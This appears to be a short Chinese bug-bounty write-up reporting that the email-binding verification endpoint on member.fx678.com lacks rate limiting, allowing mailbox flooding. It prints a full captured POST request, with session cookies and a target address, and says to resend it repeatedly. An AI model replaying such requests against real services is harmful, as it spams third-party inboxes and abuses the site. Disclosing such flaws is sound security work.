[关闭]
@1kbfree 2018-10-17T01:31:16.000000Z 字数 1048 阅读 2087

补天 - 汇通网绑定邮箱处存在邮箱资源消耗

漏洞挖掘

1、打开Url:https://member.fx678.com/UserInfo/updateMail

image_1cpuuq2ifvcrah7v2179er7n9.png-99.7kB

然后点击获取验证码然后抓包,数据包如下

  1. POST /Send/sendResetEmail HTTP/1.1
  2. Host: member.fx678.com
  3. User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
  4. Accept: */*
  5. Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
  6. Accept-Encoding: gzip, deflate
  7. Content-Type: application/x-www-form-urlencoded; charset=UTF-8
  8. X-Requested-With: XMLHttpRequest
  9. Referer: https://member.fx678.com/UserInfo/updateMail
  10. Content-Length: 25
  11. Cookie: Hm_lvt_d25bd1db5bca2537d34deae7edca67d3=1539710176; Hm_lpvt_d25bd1db5bca2537d34deae7edca67d3=1539710176; UM_distinctid=1667de0cecb29e-06644d3658dcea8-1262694a-19a100-1667de0cecc32d; PHPSESSID=fe3tjehbisasi1lk6bbgar63h2; laravel_session=eyJpdiI6IjJxNnh6RlFaa3BrbExjSlwva1BqQ0l3PT0iLCJ2YWx1ZSI6Im1zRFJJS01mZCtFVFRwZzg3eG8yelBmbFdIUktTTGhcL05zWUJLVHkyNXF0WlJVbUllNHhNSHhhVkZwQlwvQlN6N3hMNnJKVCt4bCtpZUI4Nmw1Wmw5eEE9PSIsIm1hYyI6IjcwOWE4NjZlYjI0YTljNjhhZGZmYzVhMTlhOTNhMzMxYjkxOWUzY2M5NmYzMzZkZjc3NzhjZGUyZGYxZTYxNTAifQ%3D%3D
  12. DNT: 1
  13. Connection: close
  15. email=1900065568%40qq.com

然后一直发包

image_1cpuus8731a251197lbr10br18mcm.png-454.8kB

添加新批注
在作者公开此批注前,只有你和作者可见。
回复批注